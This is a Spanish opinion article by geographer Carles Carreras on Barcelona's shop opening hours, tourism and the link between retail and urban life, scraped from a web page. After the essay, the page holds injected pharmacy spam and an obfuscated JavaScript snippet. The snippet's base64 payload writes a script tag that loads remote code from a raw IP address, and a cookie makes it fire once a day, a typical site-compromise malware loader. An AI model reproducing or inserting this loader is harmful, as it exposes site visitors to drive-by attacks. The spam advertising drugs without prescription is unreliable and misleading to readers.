Los tiempos del consumo

El Ayun­ta­miento de Bar­ce­lona ha pre­sen­tado un estu­dio sobre los hora­rios comer­cia­les que había encar­gado al grupo de inves­ti­ga­ción que dirige Jordi Suri­ñach, cate­drá­tico de eco­no­me­tría de la Uni­ver­si­dad de Bar­ce­lona. Los medios de comu­ni­ca­ción lo pre­sen­tan como el estu­dio de la Uni­ver­si­dad de Bar­ce­lona, como en tan­tas oca­sio­nes con­fun­diendo el todo con sus par­tes; con­fu­sión, por otro lado, que pone de relieve la res­pon­sa­bi­li­dad que los miem­bros de ins­ti­tu­cio­nes públi­cas tene­mos a la hora de difun­dir nues­tros trabajos.

Los hora­rios comer­cia­les son un viejo caba­llo de bata­lla que enfrenta empre­sa­rios y ges­to­res, ciu­da­da­nos y polí­ti­cos en un debate que se encuen­tra enro­cado desde hace mucho tiempo en posi­cio­nes ina­mo­vi­bles de intere­ses no siem­pre cla­ros. Ello no sólo en Bar­ce­lona, sino en Cata­luña, en toda España y en la mayo­ría de paí­ses del Medi­te­rrá­neo euro­peo; no se trata, pues, de un debate local desde el punto de vista geo­grá­fico. Como tam­poco de un debate banal, ya que implica intere­ses eco­nó­mi­cos, hábi­tos coti­dia­nos, creen­cias y tra­di­cio­nes reli­gio­sas y cul­tu­ra­les, lo que explica la vio­len­cia a menudo de las dis­cu­sio­nes que genera y el numan­tismo en la defensa de muchas posiciones.

A pesar del carác­ter gene­ral del debate, en Bar­ce­lona, como en otras ciu­da­des, el tema se com­plica por la masiva pre­sen­cia de turis­tas, que son gran­des con­su­mi­do­res, a lo largo de todo el año. El momento no puede ser más ade­cuado para reabrir el debate, cuando se asiste al des­censo con­ti­nuado del número de turis­tas en la ciu­dad de Madrid y se pue­den eva­luar las con­se­cuen­cias del cam­bio de signo de una de las mayo­res fuen­tes de ingre­sos con el que cuenta la mal­tre­cha eco­no­mía espa­ñola con­tem­po­rá­nea. De alguna forma, los esce­na­rios alter­na­ti­vos de éxito y deca­den­cia se con­fi­gu­ran, mucho más allá de impro­duc­ti­vas y fol­cló­ri­cas riva­li­da­des. La tras­cen­den­cia del tema no puede ser ocul­tada, dado que la inter­re­la­ción entre las acti­vi­da­des comer­cia­les y de ser­vi­cio a las per­so­nas y la vida urbana es suma­mente estre­cha; cabe recor­dar tan sólo el viejo eslo­gan comer­cial: donde hay comer­cio hay vida.

LAS ACTIVIDADES COMERCIALES Y DE SERVICIOS ESTÁN ESTRECHAMENTE RELACIONADAS CON LA VIDA URBANA 

En el debate hay que tener en cuenta diver­sos ele­men­tos. El pri­mero se deriva de la com­ple­ji­dad urbana y de la rela­ción antes seña­lada: no se pue­den tomar deci­sio­nes comer­cia­les sólo desde el sec­tor del comer­cio, ya que sus con­se­cuen­cias tras­cien­den a otros sec­to­res, incluso no eco­nó­mi­cos. La seg­men­ta­ción temá­tica de las admi­nis­tra­cio­nes diluye res­pon­sa­bi­li­da­des e intro­duce irra­cio­na­li­da­des en la ges­tión de la cosa pública. La admi­nis­tra­ción debe tomar car­tas en el asunto, y debe ana­li­zar todos los hora­rios que ges­tiona, expli­cando por­que se inter­viene en unos casos y en otros no. Y no sólo la ges­tión del tiempo, sino que hay que ana­li­zar tam­bién por­qué, en la fase de glo­ba­li­za­ción actual que se está viviendo a todos los nive­les, las con­cen­tra­cio­nes más o menos mono­po­lís­ti­cas en el comer­cio y la dis­tri­bu­ción serían más per­ver­sas que en la indus­tria o en las finan­zas, por ejem­plo. Los actua­les medios de infor­ma­ción y comu­ni­ca­ción (inter­net, tele­fo­nía móvil, redes socia­les) han cam­biado los modos de vida y de tra­bajo en muchos aspec­tos y pare­cen cami­nar hacia una socie­dad que fun­cione 24 al día, los siete días de la semana, todas las sema­nas del año, y no sólo de forma virtual.

¿POR QUÉ LA CONCENTRACIÓN DE CAPITAL EN LAS ACTIVIDADES DE COMERCIO Y DISTRIBUCIÓN ES MÁS PERVERSA QUE EN LA INDUSTRIA O EN LAS FINANZAS

La liber­tad no debe supo­ner nunca una impo­si­ción, sino todo lo con­tra­rio. Los empre­sa­rios comer­cia­les y de ser­vi­cios abier­tos al público (res­tau­ran­tes, bares, agen­cias de via­jes, pelu­que­rías, gim­na­sios…) deben agru­parse por intere­ses comu­nes, no tanto basa­dos en la sim­ple dimen­sión siem­pre enga­ñosa (muchas gran­des empre­sas pue­den apa­re­cer como peque­ñas a tra­vés de las dife­ren­tes for­mas de con­tra­ta­ción: sucur­sa­les, fran­qui­cias, cade­nas). Intere­ses que pue­den ser de espe­cia­li­za­ción o diver­si­fi­ca­ción de la oferta, de tipo­lo­gía de los clien­tes o, y sobre todo, de loca­li­za­ción. Los bue­nos empre­sa­rios comer­cia­les cono­cen más que nadie sus pro­pios clien­tes y han de poder deci­dir en qué tiem­pos pue­den alcan­zar mayor número de con­su­mi­do­res, de la misma forma que han deci­dido, sin dema­sia­das cor­ta­pi­sas, en qué espa­cio pue­den hacerlo.

La orga­ni­za­ción del espa­cio no puede des­vin­cu­larse de la del tiempo, como la ciu­dad no puede de manera alguna des­vin­cu­larse de su oferta comer­cial y de servicios.

Car­les Carre­ras es pro­fe­sor de Geo­gra­fía Humana de la Uni­ver­si­tat de Barcelona.

 
Online Drugs­tore, FOSAMAX DOSAGE, Free ship­ping, buy bena­dryl online, Dis­count 10% in Cheap Phar­macy Online Wit­hout a Pres­crip­tion

Ficha biblio­grá­fica
CARRERAS, C. Los tiem­pos del con­sumo. Geo­cri­tiQ. 14 de octu­bre de 2013, nº 4. [ISSN: 2385–5096]. <http://www.geocritiq.com/2013/10/los-tiempos-del-consumo/>
fun­ction getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>